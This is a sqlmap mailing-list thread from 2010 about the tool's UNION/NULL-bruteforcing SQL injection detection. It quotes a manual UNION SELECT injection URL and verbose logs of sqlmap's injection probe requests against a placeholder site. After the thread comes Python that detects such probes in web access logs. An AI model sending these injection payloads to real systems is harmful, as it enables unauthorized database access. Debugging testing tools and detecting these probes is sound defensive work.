Re: [sqlmap-users] Bug with union test?
From: David G. <sk...@gm...> - 2010-05-10 16:56:13
Hmm.. seems to work through the --string parameter... So I have to pass the --string parameter whenever I use the union technique for sqlmap to identify it correctly!?!

On Mon, May 10, 2010 at 11:09 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
> For me it works with no problems against SQL injection on SELECT with
> more than a column.
> Try to provide sqlmap with --string or --regex. Also, try with
> --union-tech orderby.
>
> Bernardo
>
>
> On Sun, May 9, 2010 at 21:33, David Guimaraes <sk...@gm...> wrote:
>> I noticed that this has already been happening for some time: sqlmap
>> fails to properly detect UNION inband SQL injection, even in cases
>> where the detection is quite simple, as shown below:
>>
>> http://www.vulnsite.com/vulnscript.php?id=42 and 1 = 0 union all
>> select 1,2,3,4,5,6 (mysql)
>>
>> I am currently editing the sessions file directly to use the UNION
>> technique with sqlmap.
>>
>> By using --union-test and verbose level 2, it was possible to
>> identify that sqlmap does not completely test the NULL bruteforcing
>> UNION technique. It tests only a single column, and reports whether
>> it has found the flaw.. as shown below:
>>
>> [16:58:09] [INFO] testing inband sql injection on parameter 'id' with
>> NULL bruteforcing technique
>> [16:58:09] [TRAFFIC OUT] HTTP request:
>> GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL%23%20AND%203967=3967
>> HTTP/1.1
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>> Host: www.vulnsite.com
>> Accept-language: en-us,en;q=0.5
>> Cookie:
>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net)
>> Connection: close
>>
>> [16:58:10] [INFO] confirming full inband sql injection on parameter 'id'
>> [16:58:10] [TRAFFIC OUT] HTTP request:
>> GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL%23%20AND%204073=4073
>> HTTP/1.1
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>> Host: www.vulnsite.com
>> Accept-language: en-us,en;q=0.5
>> Cookie:
>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net)
>> Connection: close
>>
>> [16:58:10] [WARNING] the target url is not affected by an exploitable
>> full inband sql injection vulnerability
>> [16:58:10] [INFO] confirming partial (single entry) inband sql
>> injection on parameter 'id' by appending a false condition after the
>> parameter value
>> [16:58:11] [TRAFFIC OUT] HTTP request:
>> GET /vulnscript.php?id=42%20AND%206261=6262%20UNION%20ALL%20SELECT%20NULL%23%20AND%206194=6194
>> HTTP/1.1
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>> Host: www.vulnsite.com
>> Accept-language: en-us,en;q=0.5
>> Cookie:
>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net)
>> Connection: close
>>
>> [16:58:11] [WARNING] the target url is not affected by an exploitable
>> partial (single entry) inband sql injection vulnerability
>> [16:58:11] [INFO] confirming partial (single entry) inband sql
>> injection on parameter 'id' with negative parameter value
>> [16:58:11] [TRAFFIC OUT] HTTP request:
>> GET /vulnscript.php?id=-42%20UNION%20ALL%20SELECT%20NULL%23%20AND%204970=4970
>> HTTP/1.1
>> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>> Host: www.vulnsite.com
>> Accept-language: en-us,en;q=0.5
>> Cookie:
>> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
>> User-agent: sqlmap/0.9-dev (http://sqlmap.sourceforge.net)
>> Connection: close
>>
>> [16:58:12] [WARNING] the target url is not affected by an exploitable
>> partial (single entry) inband sql injection vulnerability
>> valid union: None
>>
>> The sqlmap documentation says: "By default sqlmap uses the NULL
>> bruteforcing technique to detect the number of columns within the
>> original SELECT statement."
>>
>> I think the correct use of the brute force technique would be to test
>> several columns until it finds the correct number. Right?
>>
>> --
>> David Gomes Guimarães
>>
>> ------------------------------------------------------------------------------
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F
>

--
David Gomes Guimarães
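The NULL bruteforcing the reporter expects (and the quoted documentation describes) steps the column count up one NULL per request until the response changes, which leaves a recognisable trail in web server logs. As an added example, not part of this thread or of sqlmap, here is defender-side Python that parses constructed Common Log Format lines (hypothetical client IPs, the thread's /vulnscript.php path), decodes each URL, counts the NULL columns in any UNION SELECT and flags a client whose column count rises monotonically across probes.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (hypothetical client IPs). The first client
# sends the probe shape quoted in the thread with one more NULL per request; the
# response size changes once the column count matches the original SELECT.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2010:16:58:09 +0000] "GET /vulnscript.php?id=42 HTTP/1.1" 200 1532
203.0.113.7 - - [10/May/2010:16:58:09 +0000] "GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL%23%20AND%203967=3967 HTTP/1.1" 200 1532
203.0.113.7 - - [10/May/2010:16:58:10 +0000] "GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL,%20NULL%23%20AND%204073=4073 HTTP/1.1" 200 1532
203.0.113.7 - - [10/May/2010:16:58:10 +0000] "GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL%23%20AND%204100=4100 HTTP/1.1" 200 1532
203.0.113.7 - - [10/May/2010:16:58:11 +0000] "GET /vulnscript.php?id=42%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL%23%20AND%204120=4120 HTTP/1.1" 200 1601
198.51.100.9 - - [10/May/2010:16:59:02 +0000] "GET /vulnscript.php?id=17 HTTP/1.1" 200 1498
"""

# Common Log Format fields we need: client IP, request URL, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3} (?P<size>\d+)')
# A UNION [ALL] SELECT whose projected columns are all NULL, as in the quoted probes.
UNION_NULL_RE = re.compile(
    r'\bunion\s+(?:all\s+)?select\s+(?P<cols>null(?:\s*,\s*null)*)', re.IGNORECASE)


def null_column_count(url):
    """Return how many NULL columns a UNION SELECT probe in `url` projects (0 if none)."""
    match = UNION_NULL_RE.search(unquote_plus(url))
    if not match:
        return 0
    return len(re.findall(r'null', match.group("cols"), re.IGNORECASE))


def find_bruteforce_sources(log_text, min_probes=3):
    """Flag clients whose UNION NULL column count rises monotonically over at least
    `min_probes` requests; keep response sizes so the analyst sees where they changed."""
    probes = defaultdict(lambda: {"columns": [], "sizes": []})
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        cols = null_column_count(match.group("url"))
        if cols:
            probes[match.group("ip")]["columns"].append(cols)
            probes[match.group("ip")]["sizes"].append(int(match.group("size")))
    flagged = {}
    for ip, seen in probes.items():
        cols = seen["columns"]
        if len(cols) >= min_probes and all(b > a for a, b in zip(cols, cols[1:])):
            flagged[ip] = seen
    return flagged
```

Running `find_bruteforce_sources(SAMPLE_LOG)` on the constructed log flags only 203.0.113.7, with column counts 1 through 4 and the response size jumping at the fourth probe.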